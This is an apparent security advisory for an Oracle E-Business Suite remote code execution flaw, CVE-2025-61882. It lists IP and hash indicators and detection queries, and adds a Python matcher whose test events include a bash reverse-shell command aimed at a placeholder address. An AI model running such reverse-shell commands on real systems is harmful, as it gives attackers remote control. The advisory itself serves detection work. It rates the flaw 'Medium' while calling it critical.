Oracle Security Alert Advisory - CVE-2025-61882

    Date: 10/07/2025

    Severity: Medium

    Summary

    CVE-2025-61882 is a critical remote code execution vulnerability in Oracle E-Business Suite that can be exploited over the network without authentication. Oracle urges customers to apply the latest patches immediately; the October 2023 Critical Patch Update must already be in place before the fix for this alert can be applied.

    Indicators of Compromise (IOC) List

    IP Addresses:

    200.107.207.26

    185.181.60.11

    SHA-256 Hashes:

    76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d

    aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121

    6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b

    Command (remote host and port elided in the source):

    sh -c /bin/bash -i >& /dev/tcp// 0>&1

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    dstipaddress IN ("200.107.207.26","185.181.60.11") or srcipaddress IN ("200.107.207.26","185.181.60.11")

    Detection Query 2 :

    sha256hash IN ("76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d","aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121","6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b")

    Detection Query 3 :

    resourcename = "Windows Security" AND commandline like "sh -c /bin/bash -i >& /dev/tcp// 0>&1"

    Detection Query 4 :

    technologygroup = "EDR" AND commandline like "sh -c /bin/bash -i >& /dev/tcp// 0>&1"
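    The four queries above, implemented as matching logic over constructed sample events so the IOCs can be checked outside the TDIR platform. This is an added example, not Gurucul's or Oracle's code; the field names follow the queries, the sample events are constructed, and because the advisory's command string has its host and port elided, the command-line check matches the bash /dev/tcp redirection form with any host and port rather than the literal truncated string.

```python
import re

# Indicators taken from the advisory above.
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}
# The advisory shows "/dev/tcp//" with host and port removed; a literal
# "like" match on that string would never fire on a real event, so match
# the interactive-bash-over-/dev/tcp form with any host and port instead.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\s*>&\s*/dev/tcp/[^/\s]+/\d+\s+0>&1")


def match_event(event):
    """Return the advisory query numbers (1-4) that fire on one event dict."""
    hits = []
    if event.get("srcipaddress") in IOC_IPS or event.get("dstipaddress") in IOC_IPS:
        hits.append(1)  # Detection Query 1
    if (event.get("sha256hash") or "").lower() in IOC_SHA256:
        hits.append(2)  # Detection Query 2 (hashes compared case-insensitively)
    if REVERSE_SHELL_RE.search(event.get("commandline", "")):
        if event.get("resourcename") == "Windows Security":
            hits.append(3)  # Detection Query 3
        if event.get("technologygroup") == "EDR":
            hits.append(4)  # Detection Query 4
    return hits


def scan(events):
    """Map event id -> list of matching queries, for events with any hit."""
    return {e["id"]: match_event(e) for e in events if match_event(e)}


# Constructed sample events (not from the advisory). The host in the
# command line is a TEST-NET documentation address used as a placeholder.
SAMPLE_EVENTS = [
    {"id": "e1", "srcipaddress": "10.0.0.5", "dstipaddress": "200.107.207.26"},
    {"id": "e2", "sha256hash": "AA0D3859D6633B62BCCFB69017D33A8979A3BE1F3F0A5A4BF6960D6C73D41121"},
    {"id": "e3", "technologygroup": "EDR",
     "commandline": "sh -c /bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"},
    {"id": "e4", "technologygroup": "EDR", "commandline": "sh -c ls -la /tmp"},
]

if __name__ == "__main__":
    for event_id, queries in scan(SAMPLE_EVENTS).items():
        print(f"{event_id}: matched detection queries {queries}")
```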
     

    Reference:

    https://www.oracle.com/security-alerts/alert-cve-2025-61882.html


    Tags: Vulnerability, CVE-2025, Oracle, Exploit
